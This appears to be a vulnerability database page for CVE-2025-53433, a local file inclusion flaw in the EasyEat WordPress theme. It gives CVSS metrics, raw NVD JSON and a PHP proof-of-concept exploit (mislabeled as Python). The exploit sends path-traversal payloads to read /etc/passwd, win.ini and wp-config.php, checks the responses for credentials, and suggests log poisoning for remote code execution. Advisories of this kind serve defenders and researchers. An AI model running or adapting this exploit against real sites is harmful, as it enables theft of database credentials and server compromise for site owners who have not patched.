Security Vulnerability Report
中文
CVE-2025-53433 CVSS 9.8 CRITICAL

CVE-2025-53433

Published: 2025-12-18 08:15:54
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes EasyEat easyeat allows PHP Local File Inclusion.This issue affects EasyEat: from n/a through <= 1.9.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EasyEat WordPress主题 <= 1.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-53433 PoC - EasyEat Theme Local File Inclusion * Target: AncoraThemes EasyEat WordPress Theme <= 1.9.0 * Vulnerability: Improper Control of Filename for Include/Require Statement * * Usage: php poc.php <target_url> <vulnerable_param> * Example: php poc.php http://target.com/ action * * Note: This PoC is for authorized security testing only. */ $target_url = $argv[1] ?? ''; $vuln_param = $argv[2] ?? 'action'; if (empty($target_url)) { echo "Usage: php poc.php <target_url> [vulnerable_param]\n"; echo "Example: php poc.php http://victim.com/ action\n"; exit(1); } // Common sensitive files to read $target_files = [ '../../../../../../../../etc/passwd', '../../../../../../windows/win.ini', '../../../../../../../../../wp-config.php', '../../../../../../../../etc/hosts' ]; echo "[*] CVE-2025-53433 PoC - EasyEat Theme LFI\n"; echo "[*] Target: $target_url\n"; echo "[*] Parameter: $vuln_param\n\n"; foreach ($target_files as $file) { $payload = urlencode($file); $exploit_url = $target_url . "?" . $vuln_param . "=" . $payload; echo "[+] Testing: $file\n"; echo " URL: $exploit_url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $exploit_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && !empty($response)) { echo " [✓] Success - File content retrieved!\n"; echo " [+] Response length: " . strlen($response) . " bytes\n"; // Check for sensitive content if (preg_match('/root:|\[extensions\]|DB_/', $response)) { echo " [!] Sensitive data detected!\n\n"; } } else { echo " [-] Failed (HTTP $http_code)\n"; } echo "\n"; } echo "[*] PoC completed. Check responses above for successful file reads.\n"; echo "[*] Recommended next steps:\n"; echo " 1. Read wp-config.php for database credentials\n"; echo " 2. Check for log poisoning / RCE possibilities\n"; echo " 3. Report to vendor and apply patch\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53433", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:53.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes EasyEat easyeat allows PHP Local File Inclusion.This issue affects EasyEat: from n/a through <= 1.9.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/easyeat/vulnerability/wordpress-easyeat-theme-1-9-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}